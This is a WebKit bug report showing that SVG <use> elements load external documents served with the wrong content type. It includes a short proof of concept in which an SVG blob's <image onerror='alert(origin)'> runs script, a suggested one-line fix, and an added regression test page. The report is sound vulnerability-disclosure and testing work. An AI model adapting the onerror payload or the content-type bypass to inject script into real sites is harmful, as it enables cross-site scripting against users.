[Webkit-unassigned] [Bug 249948] New: SVGUseElement sniffs content type when loading external document

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Thu Dec 29 14:38:35 PST 2022


https://bugs.webkit.org/show_bug.cgi?id=249948

            Bug ID: 249948
           Summary: SVGUseElement sniffs content type when loading
                    external document
           Product: WebKit
           Version: WebKit Nightly Build
          Hardware: Unspecified
                OS: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: SVG
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: s.h.h.n.j.k at gmail.com
                CC: sabouhallawa at apple.com, zimmermann at kde.org

PoC:

```
// External SVG document whose <image> fails to load and runs the onerror handler
const text = `<svg id="x" xmlns="http://www.w3.org/2000/svg"><image href="xyz" onerror="alert(origin)" /></svg>`;
const blob = new Blob([text], {type: 'application/octet-stream'}); // <- not "image/svg+xml"
const url = URL.createObjectURL(blob);
let attackerControlledString = url + "#x";
// <use> referencing the element with id "x" inside the external document
const svg = document.createElementNS("http://www.w3.org/2000/svg", "svg");
const use = document.createElementNS("http://www.w3.org/2000/svg", "use");
use.setAttribute('href', attackerControlledString);
svg.appendChild(use);
document.body.appendChild(svg);
```

The above code only loads the external SVG from a Blob URL in WebKit. Both Blink and Gecko ignore it due to the content type mismatch.

A potential fix is to add the following line after https://github.com/WebKit/WebKit/blob/5c3443a0ab7a7fdeaeeb20c104da59b55de0e265/Source/WebCore/svg/SVGUseElement.cpp#L614.

```
options.sniffContent = ContentSniffingPolicy::DoNotSniffContent;
```
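An added regression check for the behaviour described above, written as a small test page; it is not part of the report or of WebKit's test suite. It assumes the engine implements `SVGUseElement.instanceRoot` (WebKit does), which is non-null only once the external document has been accepted and the referenced element cloned into the `<use>` shadow tree, so no script in the external document is needed to observe the outcome.

```html
<!DOCTYPE html>
<meta charset="utf-8">
<title>use-external-document-content-type</title>
<p>Expected: the image/svg+xml document is applied; the mismatched types are not.</p>
<pre id="log"></pre>
<script>
// Added regression check (not from the bug report or WebKit's LayoutTests).
// The same SVG document is served from a Blob URL under several declared types;
// only image/svg+xml should be accepted by the <use> external document loader.
const SVG_NS = "http://www.w3.org/2000/svg";
const externalDoc = `<svg xmlns="${SVG_NS}"><rect id="x" width="10" height="10"/></svg>`;

// Resolves to true if the external document was applied (instanceRoot became
// non-null), false if it was still unresolved after timeoutMs.
function loadViaUse(declaredType, timeoutMs = 1500) {
  const url = URL.createObjectURL(new Blob([externalDoc], { type: declaredType }));
  const svg = document.createElementNS(SVG_NS, "svg");
  const use = document.createElementNS(SVG_NS, "use");
  use.setAttribute("href", url + "#x");
  svg.appendChild(use);
  document.body.appendChild(svg);
  return new Promise((resolve) => {
    const started = performance.now();
    (function poll() {
      if (use.instanceRoot) return resolve(true);
      if (performance.now() - started > timeoutMs) return resolve(false);
      setTimeout(poll, 50);
    })();
  }).finally(() => { svg.remove(); URL.revokeObjectURL(url); });
}

(async () => {
  const cases = [
    { type: "image/svg+xml", expectApplied: true },             // positive control
    { type: "application/octet-stream", expectApplied: false }, // the report's case
    { type: "text/plain", expectApplied: false },               // another mismatch (assumed)
  ];
  const log = document.getElementById("log");
  for (const c of cases) {
    const applied = await loadViaUse(c.type);
    const verdict = applied === c.expectApplied ? "PASS" : "FAIL";
    log.textContent += `${verdict}: declared ${c.type} -> ${applied ? "applied" : "rejected"}\n`;
  }
})();
</script>
```

Because Blob URLs are same-origin, the page exercises only the content type check, not the loader's origin restrictions.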
